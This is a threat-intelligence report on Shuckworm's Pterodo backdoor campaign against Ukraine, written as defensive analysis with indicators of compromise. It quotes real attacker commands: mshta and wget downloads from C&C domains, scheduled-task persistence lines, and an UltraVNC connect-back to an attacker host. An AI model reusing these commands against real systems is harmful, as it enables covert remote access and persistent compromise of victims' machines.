Shuckworm Continues Cyber-Espionage Attacks Against Ukraine

At 08:48 (local-time), a suspicious Word document is opened on the machine.
Just five minutes after the document is opened, a suspicious command is also executed to launch a malicious VBS file (depended.lnk). This file is a known custom backdoor leveraged by Shuckworm (aka Pterodo).

wscript.exe CSIDL_PROFILEsearchesdepended.lnk //e:VBScript //b
The backdoor is used to download and execute CSIDL_PROFILEsearchesdepended.exe (94a78d5dce553832d61b59e0dda9ef2c33c10634ba4af3acb7fb7cf43be17a5b) from hxxp://92.242.62.131/wordpress.php?is=[REDACTED].

Two additional VBS scripts are observed being executed via depended.exe:

“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdataroamingreflect.rar //e:VBScript //b
“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltempdeep-thoughted. //e:VBScript //b
A scheduled task is then created to likely ensure persistence between system reboots and to execute the dropped script. This ensures the VBS file deep-thoughted.ppt is executed every 10 minutes:

SCHTASKS /CREATE /sc minute /mo 10 /tn “deep-thoughted” /tr “wscript.exe ” CSIDL_COMMON_PICTURESdeep-thoughted.ppt //e:VBScript //b” /F
Later, the attackers are observed executing an HTA file hosted on a remote server by abusing mshta.exe via depended.exe. The Mshta utility can execute Microsoft HTML Application (HTA) files and can be abused to bypass application control solutions. Since mshta.exe executes outside of Internet Explorer’s security context, it also bypasses browser security settings.

“CSIDL_SYSTEMcmd.exe” /c CSIDL_SYSTEMmshta.exe hxxp://fiordan.ru/FILM.html /f id=[REDACTED]
At the same time, a new variant of Pterodo is installed via depended.exe.

Similarly to before, two additional scheduled tasks are created:

“CSIDL_SYSTEMschtasks.exe” /CREATE /sc minute /mo 12 /tn “MediaConverter” /tr “wscript.exe ” CSIDL_COMMON_MUSICtvplaylist.mov //e:VBScript //b ” /F”
“CSIDL_SYSTEMschtasks.exe” /CREATE /sc minute /mo 12 /tn “VideoHostName” /tr “wscript.exe ” CSIDL_COMMON_VIDEOwebmedia.m3u //e:VBScript //b ” /F”
The attackers continue to install variants of their backdoor and execute commands via scripts to ensure persistence:

“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp22333.docx //e:VBScript //b
“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp9140.d //e:VBScript //b
wscript.exe CSIDL_COMMON_MUSICtvplaylist.mov //e:VBScript //b
schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr “wscript.exe C:Userso.korolAppDataRoamingbatterybattery.dat //e:VBScript //b”
“CSIDL_SYSTEMcmd.exe” /c CSIDL_PROFILEappdataroamingbatterybattery.cmd
Directly after this, it appears the attackers test connectivity to a new C&C server via ping.exe:

CSIDL_SYSTEMcmd.exe /c ping -n 1 arianat.ru
Once the connection is confirmed to be active, the attackers proceed to download another variant of their Pterodo backdoor and begin using the new C&C to download additional scripts and tools, as well as creating scheduled tasks to run every few minutes.

“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp12382. //e:VBScript //b
“CSIDL_SYSTEMcmd.exe” /c CSIDL_SYSTEMmshta.exe hxxp://avirona.ru/7-ZIP.html /f id=
CSIDL_SYSTEMmshta.exe hxxp://avirona.ru/7-ZIP.html /f id=
“CSIDL_SYSTEMschtasks.exe” /CREATE /sc minute /mo 12 /tn “MediaConverter” /tr “wscript.exe ” CSIDL_COMMON_MUSICmediatv.mov //e:VBScript //b ” /F”
“CSIDL_SYSTEMschtasks.exe” /CREATE /sc minute /mo 12 /tn “VideoHostName” /tr “wscript.exe ” CSIDL_COMMON_VIDEOvideotv.m3u //e:VBScript //b ” /F”
At this point, the attackers cease activity. However, analysts continue to see commands being executed from the scheduled tasks for the remainder of July 14.

The attackers, then, return, and several additional variants of Pterodo are executed via CSIDL_COMMON_VIDEOplaneta.exe (1ea3881d5d03214d6b7e37fb7b10221ef51782080a24cc3e275f42a3c1ea99c1).

“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp32440.docx //e:VBScript //b
“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp20507.d //e:VBScript //b
The attackers are then observed executing commands via planeta.exe:

CSIDL_SYSTEMcmd.exe /c “”CSIDL_PROFILEappdatalocaltemp7zsfx000.”” “”
“CSIDL_SYSTEMcmd.exe” /c ipconfig /flushdns
The above flushdns command may indicate that the attackers have updated the DNS records for their C&Cs, as analysts observed some of their tools use hard-coded domains. In this particular instance, the flushdns command was executed shortly before the attackers attempted to install additional backdoors that leveraged the same C&C.

Later, another variant of Pterodo (deep-sided.fly) was executed and was used to download and execute a new file called deerskin.exe (ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29). This file is a dropper for a VNC client. When executed, it pings google DNS (8.8.8.8) to test internet connectivity, then proceeds to drop a VNC client and establishes a connection to a remote C&C server controlled by the attackers:

“%USERPROFILE%ContactsDriversHood.exe” -autoreconnect -id:2097 -connect mucoris.ru:5612
Two such files have been identified that perform the same actions:

1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f
ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29
This VNC client appears to be the ultimate payload for this attack.

During the course of this incident, specifically post VNC client installation, a number of documents were opened from various locations on the compromised machine.
It is unclear if this was legitimate user activity or the activity of the attackers attempting to collect and exfiltrate sensitive information.
Titles of the documents accessed ranged from job descriptions to sensitive information pertaining to the targeted organization.

Thorough investigations uncovered a total of seven files used by Shuckworm in recent attacks.
All seven files are 7-zip SFX self-extracting binaries, a format used previously in Shuckworm attacks.

descend.exe

Upon execution, the file named descend.exe (0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137) drops a VBS file which, in turn, drops a second VBS file in the following locations:

%USERPROFILE%Downloadsdeerbrook.ppt
%PUBLIC%Picturesdeerbrook.ppt
It then creates the following task:

SCHTASKS /CREATE /sc minute /mo 11 /tn “deerbrook” /tr “wscript.exe ‘deerbrook.ppt’ //e:VBScript //b” /F
The file deerbrook.ppt (b46e872375b3c910fb589ab75bf130f7e276c4bcd913705a140ac76d9d373c9e) VBS file contacts a command-and-control (C&C) server at deep-pitched.enarto.ru. If the C&C server is available, a HTTP POST request is sent to download a payload, which is saved in the %USERPROFILE% folder as deep-sunken.tmp then renamed to deep-sunken.exe and executed. The binary is then deleted.

deep-sunken.exe

Upon execution, the file deep-sunken.exe (02c41bddd087522ce60f9376e499dcee6259853dcb50ddad70cb3ef8dd77c200) drops the following files on the compromised computer:

%APPDATA%babybaby.cmd
%APPDATA%babybaby.dat
%APPDATA%babybasement.exe (wget binary)
%APPDATA%babyvb_baby.vbs
It then creates the following task:

schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr “wscript.exe [%APPDATA%]babybaby.dat” //e:VBScript //b
It then connects to a C&C server (arianat.ru) to download another payload using wget:

basement.exe –user-agent=”Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64::[VICTIM_ID]::/.beagle/.” -q -b -c -t 2 “hxxp://arianat.ru/baby.php” -P “[%APPDATA%]baby”
The baby.dat file is a VBS file that executes baby.cmd, which then downloads and executes the payload from the C&C server.

The vb_baby.vbs file renames the downloaded payload from baby.php to backed.exe.

The downloaded payload (backed.exe) could not be retrieved. However, the following files were also obtained during investigation:

z4z05jn4.egf.exe

The file z4z05jn4.egf.exe (fd9a9dd9c73088d1ffdea85540ee671d8abb6b5ab37d66a760b2350951c784d0) is similar to the previous file (deep-sunken.exe) but with different folders, file names, and C&C server (iruto.ru).

defiant.exe

Once executed, the file defiant.exe (a20e38bacc979a5aa18f1954df1a2c0558ba23cdc1503af0ad1021c330f1e455) drops a VBS file in the following locations:

%TEMP%\deep-versed.nls
%PUBLICPicturesdeep-versed.nls
It then creates the following task:

SCHTASKS /CREATE /sc minute /mo 12 /tn “deep-versed” /tr “wscript.exe “[%PUBLIC%]\Pictures\deep-versed.nls” //e:VBScript //b” /F
The dropped file deep-versed.nls (817901df616c77dd1e5694e3d75aebb3a52464c23a06820517108c74edd07fbc) downloads a payload from a C&C server (deep-toned.chehalo.ru) and saves it as deep-green.exe in the following location:

%PUBLIC%Downloads
deep-green.exe

The file deep-green.exe (1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f) contains an UltraVNC binary, which upon execution connects to a repeater (mucoris.ru:5612) using the following command line:

-autoreconnect -id:%RANDOM% -connect mucoris.ru:5612
UltraVNC is an open-source remote-administration/remote-desktop-software utility.

deep-green.exe

A second file named deep-green.exe (f6c56a51c1f0139036e80a517a6634d4d87d05cce17c4ca5adc1055b42bf03aa) contain a Process Explorer (procexp) binary.

Process Explorer is a freeware task manager and system monitor for Microsoft Windows.

deep-green.exe

A third file called deep-green.exe (de5a53a3b75e3e730755af09e3cacb7e6d171fc9b1853a7200e5dfb9044ab20a) is similar to descend.exe (0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137) just with different file names and C&C server (deer-lick.chehalo.ru).

deep-green.exe

The fourth and final file named deep-green.exe (d15a7e69769f4727f7b522995a17a0206ac9450cfb0dfe1fc98fd32272ee5ba7) drops a VBS file in the following location:

%PUBLIC%Music
It then creates the following task:

“/CREATE /sc minute /mo 12 /tn “MediaConverter” /tr “wscript.exe “C:\Users\Public\Music\MediaConvertor.dat” //e:VBScript //b ” /F”
The MediaConvertor.dat file searches for removable drives and creates a .lnk file with the following command:

mshta.exe hxxp://PLAZMA.VIBER.ontroma.ru/PLAZMA.html /f id=January

Sign Up For Threat Alerts

Loading...
Threats Icon

Jul 04, 2023

Rhysida Ransomware RaaS Crawls Out of Crimeware...

The Rhysida ransomware-as-a-service (RaaS) group has gone from a dubious newcomer to a fully-fledged ransomware...

Threats Icon

Jun 26, 2023

Operation Magalenha – Long-Running Campaign Pursues Portuguese...

The attackers can steal credentials and exfiltrate users' data and personal information, which can be...

Threats Icon

Apr 24, 2023

Lazarus Group Adds Linux Malware to Arsenal...

Researchers have discovered a new campaign conducted by Lazarus, known as "Operation DreamJob," which targets...

Threats Icon

Apr 23, 2023

Additional IOCs for 3cx breach

Recently an unexpected malicious activity emanating from a legitimate, signed binary, 3CXDesktopApp was observed.

Threats Icon

Apr 23, 2023

Ex-Conti and FIN7 Actors Collaborate with New...

IBM Security X-Force recently discovered a new malware family Analysts have called "Domino," which Analysts...

Threats Icon

Apr 20, 2023

AuKill EDR killer malware abuses Process Explorer...

The AuKill tool abuses an outdated version of the driver used by version 16.32 of...

Threats Icon

Apr 20, 2023

Fake Chrome updates spread malware

A campaign running since the end of last year is using hacked sites to push...

Threats Icon

Apr 20, 2023

QBot using new attack vector in its...

QBot, also known as QakBot, previously operated as a banking trojan and has since transformed...

Threats Icon

Apr 20, 2023

CrossLock Ransomware Emerges: New Golang – Based...

The CrossLock ransomware employs the double extortion technique to increase the likelihood of payment from...

Threats Icon

Apr 20, 2023

Windows Zero-Day Vulnerability CVE-2023-28252 Exploited by Nokoyawa...

A zero-day vulnerability in the Microsoft Windows system, which also affects Windows 11, has been...

Threats Icon

Apr 18, 2023

Additional IOcs for 3cx breach

Recently an unexpected malicious activity emanating from a legitimate, signed binary, 3CXDesktopApp was observed. As...

Threats Icon

Apr 18, 2023

Additional IOcs for 3cx breach

Recently an unexpected malicious activity emanating from a legitimate, signed binary, 3CXDesktopApp was observed. As...

Threats Icon

Apr 18, 2023

APT36 Expands Interest Within Indian Education Sector

Symantec described UPS in 2016 report as Buckeye (also known as APT3 Gothic Panda UPS...

Threats Icon

Apr 17, 2023

ChinaZ DDoS Bot Malware Distributed To Linux...

The ChinaZ DDoS bot malware was discovered targeting Linux systems while a version for Microsoft...

Threats Icon

Apr 16, 2023

Resurgence Of The Mexals Cryptojacking Campaign

The Mexals crypto jacking campaign has been in operation since at least 2021 and continues...